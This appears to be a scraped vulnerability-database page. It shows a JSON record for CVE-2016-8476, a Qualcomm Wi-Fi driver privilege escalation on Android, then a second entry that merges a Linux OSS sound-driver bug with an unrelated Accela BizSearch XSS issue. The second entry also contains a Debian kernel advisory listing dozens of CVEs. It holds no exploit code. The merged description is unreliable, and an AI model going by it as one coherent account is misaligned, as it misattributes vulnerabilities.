An elevation of privilege vulnerability in the Qualcomm Wi-Fi driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-32879283. References: QC-CR#1091940. GoogleNexus/Pixel is a Google smartphone from the United States. Google Nexus/ Pixel products are prone to multiple privilege-escalation vulnerabilities. These issues are being tracked by Android Bug IDs A-32402310, A-32402604, A-32450647, A-32454494, A-32451171, A-32451104, A-33252788, A-32872662, A-32871330, A-32877494 and A-32879283

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201702-0122",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "android",
        "scope": null,
        "trust": 1.4,
        "vendor": "google",
        "version": null
      },
      {
        "model": "android",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "google",
        "version": "7.1.1"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "5x"
      },
      {
        "model": "pixel",
        "scope": null,
        "trust": 0.6,
        "vendor": "google",
        "version": null
      },
      {
        "model": "pixel xl",
        "scope": null,
        "trust": 0.6,
        "vendor": "google",
        "version": null
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "7.1.1"
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01584"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007341"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8476"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-328"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:google:android:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "7.1.1",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8476"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Hao Chen and Guang Gong of Alpha Team, Qihoo 360 Technology Co. Ltd",
    "sources": [
      {
        "db": "BID",
        "id": "96047"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2016-8476",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.6,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2016-8476",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "id": "CNVD-2017-01584",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.0,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2016-8476",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-8476",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-01584",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201702-328",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-8476",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01584"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8476"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007341"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8476"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-328"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in the Qualcomm Wi-Fi driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-32879283. References: QC-CR#1091940. GoogleNexus/Pixel is a Google smartphone from the United States. Google Nexus/ Pixel products are prone to multiple privilege-escalation vulnerabilities. \nThese issues are being tracked by Android Bug IDs A-32402310, A-32402604, A-32450647, A-32454494, A-32451171, A-32451104, A-33252788, A-32872662, A-32871330, A-32877494 and A-32879283",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8476"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007341"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01584"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8476"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-8476",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "96047",
        "trust": 2.0
      },
      {
        "db": "SECTRACK",
        "id": "1037798",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007341",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01584",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-328",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8476",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01584"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8476"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007341"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8476"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-328"
      }
    ]
  },
  "id": "VAR-201702-0122",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01584"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01584"
      }
    ]
  },
  "last_update_date": "2023-12-18T11:45:18.915000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin-February 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for QualcommWi-FiDriver Privilege Escalation Vulnerability (CNVD-2017-01584) for GoogleNexus/Pixel Products",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/89416"
      },
      {
        "title": "Android Qualcomm Wi-Fi Fixes for driver permission and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=67612"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014February 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=861656f01e3e18209f39ad844e9ee35d"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01584"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8476"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007341"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-328"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-264",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007341"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8476"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/bid/96047"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1037798"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-8476"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-8476"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/264.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01584"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8476"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007341"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8476"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-328"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01584"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8476"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007341"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8476"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-328"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01584"
      },
      {
        "date": "2017-02-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8476"
      },
      {
        "date": "2017-02-07T00:00:00",
        "db": "BID",
        "id": "96047"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-007341"
      },
      {
        "date": "2017-02-08T15:59:00.487000",
        "db": "NVD",
        "id": "CVE-2016-8476"
      },
      {
        "date": "2017-02-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-328"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01584"
      },
      {
        "date": "2017-07-25T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8476"
      },
      {
        "date": "2017-03-07T00:02:00",
        "db": "BID",
        "id": "96047"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-007341"
      },
      {
        "date": "2017-07-25T01:29:03.217000",
        "db": "NVD",
        "id": "CVE-2016-8476"
      },
      {
        "date": "2017-02-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-328"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-328"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Qualcomm Wi-Fi Vulnerability that could elevate privileges in drivers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007341"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-328"
      }
    ],
    "trust": 0.6
  }
}

var-201206-0031
Vulnerability from variot

Multiple array index errors in sound/oss/opl3.c in the Linux kernel before 2.6.39 allow local users to cause a denial of service (heap memory corruption) or possibly gain privileges by leveraging write access to /dev/sequencer. The standard search page of Accela BizSearch contains a cross-site scripting vulnerability.By setting up a fraudulent website that exploits an XSS vulnerability of the Accela BizSearch's standard search page (the "targeted website") via the Internet, a remote attacker could execute arbitrary code on the computer of the visitors (the "victims") who have accessed the website. Fujitsu Accela BizSearch has an input validation vulnerability that allows attackers to perform cross-site scripting attacks. The attacker can construct a malicious WEB page, entice the user to parse, obtain sensitive information or hijack the user session. Linux kernel is prone to a local privilege-escalation vulnerability. Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will cause a denial-of-service condition. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The following products are affected: eAccela BizSearch 1.0 eAccela BizSearch 2.0 eAccela BizSearch 2.1 Accela BizSearch 3.0 Accela BizSearch 3.1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


Debian Security Advisory DSA-2264-1 security@debian.org http://www.debian.org/security/ dann frazier June 18, 2011 http://www.debian.org/security/faq


Package : linux-2.6 Vulnerability : privilege escalation/denial of service/information leak Problem type : local/remote Debian-specific: no CVE Id(s) : CVE-2010-2524 CVE-2010-3875 CVE-2010-4075 CVE-2010-4655 CVE-2011-0695 CVE-2011-0710 CVE-2011-0711 CVE-2011-0726 CVE-2011-1010 CVE-2011-1012 CVE-2011-1017 CVE-2011-1078 CVE-2011-1079 CVE-2011-1080 CVE-2011-1090 CVE-2011-1093 CVE-2011-1160 CVE-2011-1163 CVE-2011-1170 CVE-2011-1171 CVE-2011-1172 CVE-2011-1173 CVE-2011-1180 CVE-2011-1182 CVE-2011-1477 CVE-2011-1493 CVE-2011-1577 CVE-2011-1593 CVE-2011-1598 CVE-2011-1745 CVE-2011-1746 CVE-2011-1748 CVE-2011-1759 CVE-2011-1767 CVE-2011-1768 CVE-2011-1776 CVE-2011-2022 CVE-2011-2182 Debian Bug : 618485

Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leak. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2010-2524

David Howells reported an issue in the Common Internet File System (CIFS). 
Local users could cause arbitrary CIFS shares to be mounted by introducing
malicious redirects.

CVE-2010-3875

Vasiliy Kulikov discovered an issue in the Linux implementation of the
Amateur Radio AX.25 Level 2 protocol. Local users may obtain access to
sensitive kernel memory.

CVE-2010-4075

Dan Rosenberg reported an issue in the tty layer that may allow local
users to obtain access to sensitive kernel memory.

CVE-2011-0695

Jens Kuehnel reported an issue in the InfiniBand stack. Remote attackers can
exploit a race condition to cause a denial of service (kernel panic).

CVE-2011-0710

Al Viro reported an issue in the /proc/<pid>/status interface on the
s390 architecture. Local users could gain access to sensitive memory
in processes they do not own via the task_show_regs entry.

CVE-2011-0711

Dan Rosenberg reported an issue in the XFS filesystem. Local users may
obtain access to sensitive kernel memory.

CVE-2011-0726

Kees Cook reported an issue in the /proc/pid/stat implementation. Local
users could learn the text location of a process, defeating protections
provided by address space layout randomization (ASLR).

CVE-2011-1010

Timo Warns reported an issue in the Linux support for Mac partition tables.

CVE-2011-1012

Timo Warns reported an issue in the Linux support for Mac partition tables.

CVE-2011-1017

Timo Warns reported an issue in the Linux support for LDM partition tables. 
Users with physical access can gain access to sensitive kernel memory or
gain elevated privileges by adding a storage device with a specially
crafted LDM partition.

CVE-2011-1078

Vasiliy Kulikov discovered an issue in the Bluetooth subsystem. Local users
can obtain access to sensitive kernel memory.

CVE-2011-1079

Vasiliy Kulikov discovered an issue in the Bluetooth subsystem.

CVE-2011-1080

Vasiliy Kulikov discovered an issue in the Netfilter subsystem. Local users
can obtain access to sensitive kernel memory.

CVE-2011-1090

Neil Horman discovered a memory leak in the setacl() call on NFSv4
filesystems. Local users can exploit this to cause a denial of service
(Oops).

CVE-2011-1093

Johan Hovold reported an issue in the Datagram Congestion Control Protocol
(DCCP) implementation. Remote users could cause a denial of service by
sending data after closing a socket.

CVE-2011-1160

Peter Huewe reported an issue in the Linux kernel's support for TPM security
chips.

CVE-2011-1163

Timo Warns reported an issue in the kernel support for Alpha OSF format disk
partitions. Users with physical access can gain access to sensitive kernel
memory by adding a storage device with a specially crafted OSF partition.

CVE-2011-1170

Vasiliy Kulikov reported an issue in the Netfilter arp table
implementation.

CVE-2011-1171

Vasiliy Kulikov reported an issue in the Netfilter IP table
implementation.

CVE-2011-1172

Vasiliy Kulikov reported an issue in the Netfilter IP6 table
implementation.

CVE-2011-1173

Vasiliy Kulikov reported an issue in the Acorn Econet protocol
implementation. Local users can obtain access to sensitive kernel memory on
systems that use this rare hardware.

CVE-2011-1180

Dan Rosenberg reported a buffer overflow in the Information Access Service
of the IrDA protocol, used for Infrared devices. Remote attackers within IR
device range can cause a denial of service or possibly gain elevated
privileges.

CVE-2011-1182

Julien Tinnes reported an issue in the rt_sigqueueinfo interface. Local
users can generate signals with falsified source pid and uid information.

CVE-2011-1477

Dan Rosenberg reported issues in the Open Sound System driver for cards that
include a Yamaha FM synthesizer chip. This issue does not affect
official Debian Linux image packages as they no longer provide support for
OSS.  However, custom kernels built from Debians linux-source-2.6.32 may
have enabled this configuration and would therefore be vulnerable.

CVE-2011-1493

Dan Rosenburg reported two issues in the Linux implementation of the
Amateur Radio X.25 PLP (Rose) protocol. A remote user can cause a denial of
service by providing specially crafted facilities fields.

CVE-2011-1577

Timo Warns reported an issue in the Linux support for GPT partition tables. 
Local users with physical access could cause a denial of service (Oops)
by adding a storage device with a malicious partition table header.

CVE-2011-1593

Robert Swiecki reported a signednes issue in the next_pidmap() function,
which can be exploited my local users to cause a denial of service.

CVE-2011-1598

Dave Jones reported an issue in the Broadcast Manager Controller Area
Network (CAN/BCM) protocol that may allow local users to cause a NULL
pointer dereference, resulting in a denial of service.

CVE-2011-1745

Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian
installations, this is exploitable only by users in the video group.

CVE-2011-1746

Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian installations, this is
exploitable only by users in the video group.

CVE-2011-1748

Oliver Kartkopp reported an issue in the Controller Area Network (CAN) raw
socket implementation which permits ocal users to cause a NULL pointer
dereference, resulting in a denial of service.

CVE-2011-1759

Dan Rosenberg reported an issue in the support for executing "old ABI"
binaries on ARM processors. Local users can obtain elevated privileges due
to insufficient bounds checking in the semtimedop system call.

CVE-2011-1767

Alexecy Dobriyan reported an issue in the GRE over IP implementation. 
Remote users can cause a denial of service by sending a packet during
module initialization.

CVE-2011-1768

Alexecy Dobriyan reported an issue in the IP tunnels implementation. 
Remote users can cause a denial of service by sending a packet during
module initialization.

CVE-2011-1776

Timo Warns reported an issue in the Linux implementation for GUID
partitions. Users with physical access can gain access to sensitive kernel
memory by adding a storage device with a specially crafted corrupted
invalid partition table.

CVE-2011-2022

Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian
installations, this is exploitable only by users in the video group.

CVE-2011-2182

Ben Hutchings reported an issue with the fix for CVE-2011-1017 (see above)
that made it insufficient to resolve the issue.

For the oldstable distribution (lenny), this problem has been fixed in version 2.6.26-26lenny3. Updates for arm and hppa are not yet available, but will be released as soon as possible.

The following matrix lists additional source packages that were rebuilt for compatibility with or to take advantage of this update:

                                         Debian 5.0 (lenny)
 user-mode-linux                         2.6.26-1um-2+26lenny3

We recommend that you upgrade your linux-2.6 and user-mode-linux packages. These updates will not become active until after your system is rebooted.

Note: Debian carefully tracks all known security issues across every linux kernel package in all releases under active security support. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, updates for lower priority issues will normally not be released for all kernels at the same time. Rather, they will be released in a staggered or "leap-frog" fashion.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)

iQIcBAEBAgAGBQJN/Uv8AAoJEBv4PF5U/IZAp7QQAJmbSplvSgno69C0IFRzRgGI FS3B6uq5zNcvucQ4O2u5Zj/rPRef/M2Lxj4Vx/9FQ+4SlV/Ryazu3iknLL2iyc8a 3zZBbo6S/OvhK0Prfd88ItCxXviYJchY91qp7Pm5TOkE1rM43XLhDAi1T1W507tY 2rgqUfWkmN0Xq4Ykh3uySsIH6VkLqC5Ay7n5jXapdf3wJkyl1pg/iu0ndTnHaRTC ByQehIMbj4OOivOcy06lS89Aro+KkgPRaA0lp5enegxUZTs5S5AIo7h6v9U078xr bcUcfrOsiTpVuTRND1L7kQQhPjmIv+UlzFjYuGPbHQxfZRVnVIlB4Ny3jIyN1aBx DMqxGR+novsYIuXAZWlsF17UYQXW5CFe+7aeS06bdaWWemJGkV0Mkfb72fwa3uLz sXlLp6fju2N5RQW7WVfjx89X7SAjKmYwQnCMbo0mwdRfujBNgbkm2xCrDy+QIE23 5BnAY18kXpqaRbXPJB0sy8V99Wnl1ZSRRzX0kOZVecrhKAoCUGPJS2X+bDEtIzhB OWzxcC7P94hega5JYzteSZcyBkGRUj4604NCzD38OdPqqWvR3oWtwDRAKIR7gZ/L PRoDZucqfYV+BhXy/ib55qTo/va5gjmnlUFMP2G/TVQk9XQ/q8TxxefmnQc+Qy3A P/Hlaop/HijmZLuNpJB4 =dXCB -----END PGP SIGNATURE----- . ----------------------------------------------------------------------

Frost & Sullivan 2011 Report: Secunia Vulnerability Research \"Frost & Sullivan believes that Secunia continues to be a major player in the vulnerability research market due to its diversity of products that provide best-in-class coverage, quality, and usability.\" This is just one of the key factors that influenced Frost & Sullivan to select Secunia over other companies. Read the report here: http://secunia.com/products/corporate/vim/fs_request_2011/


TITLE: Accela / eAccela BizSearch Search Cross-Site Scripting Vulnerability

SECUNIA ADVISORY ID: SA45105

